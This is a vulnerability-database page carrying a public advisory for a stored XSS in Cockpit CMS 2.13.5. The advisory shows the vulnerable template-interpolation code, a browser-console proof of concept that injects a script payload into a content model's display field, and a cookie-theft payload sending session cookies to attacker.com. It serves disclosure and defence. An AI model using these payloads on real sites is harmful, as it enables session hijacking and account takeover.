Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

📄 Cockpit CMS 2.13.5 Cross Site Scripting

🗓️ 08 Apr 2026 00:00:00Reported by Gaurav JoshiType 
packetstorm
 packetstorm🔗 packetstorm.news👁 77 Views

Cockpit CMS 2.13.5 persistent XSS in content model display template via interpolate allows users to inject payloads.

Code
*Description:* Cockpit CMS version 2.13.5 has a stored XSS in the content
    model display template. The $interpolate function in
    /modules/App/assets/js/app/utils.js uses new Function() to evaluate
    template strings, allowing arbitrary JavaScript execution. Any
    authenticated user who can edit content models can inject a payload via the
    meta.display field that fires automatically for all users visiting the
    Content page. Impact includes session hijacking, account takeover, and
    privilege escalation.
    
    Source URL: https://github.com/Cockpit-HQ/Cockpit
    Software URL: https://getcockpit.com/
    
    Vulnerable Code (/modules/App/assets/js/app/utils.js):
    
    let interpolate = function(str, params) {
        const names = Object.keys(params);
        const vals = Object.values(params);
        return new Function(...names, `return \`${str}\`;`)(...vals);
    }
    
    
    *Steps to Reproduce:*
    1. Log in to Cockpit CMS
    2. Create a content model called "testmodel" with a text field
    3. Run this in the browser console:
    
    const csrf = App.csrf;
    fetch('/content/models/save', {
        method: 'POST',
        credentials: 'include',
        headers: { 'Content-Type': 'application/json', 'X-CSRF-TOKEN': csrf },
        body: JSON.stringify({
            model: {
                name: 'testmodel',
                type: 'collection',
                meta: { display: "${document.title='XSS_CONFIRMED_' +
    document.domain}" }
            },
            isUpdate: true
        })
    });
    
    4. Visit /content - the browser tab title changes to
    "XSS_CONFIRMED_localhost"
    
    Cookie theft payload: ${fetch('https://attacker.com/?cookie=' +
    document.cookie)}
    
    
    *Impact:*- Stored XSS fires automatically, no user interaction needed
    - Session cookies have no HttpOnly flag, allowing theft
    - Content editor can escalate to admin
    
    
    *Disclosure Timeline:*- Vendor contacted, no response received
    - 2026-04-07 Public disclosure to packetstorm

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
08 Apr 2026 00:00Current
5.6Medium risk
Vulners AI Score5.6
Cross Site ScriptingContent Model DisplayTemplate InterpolatePayload InjectionJavaScript Execution
77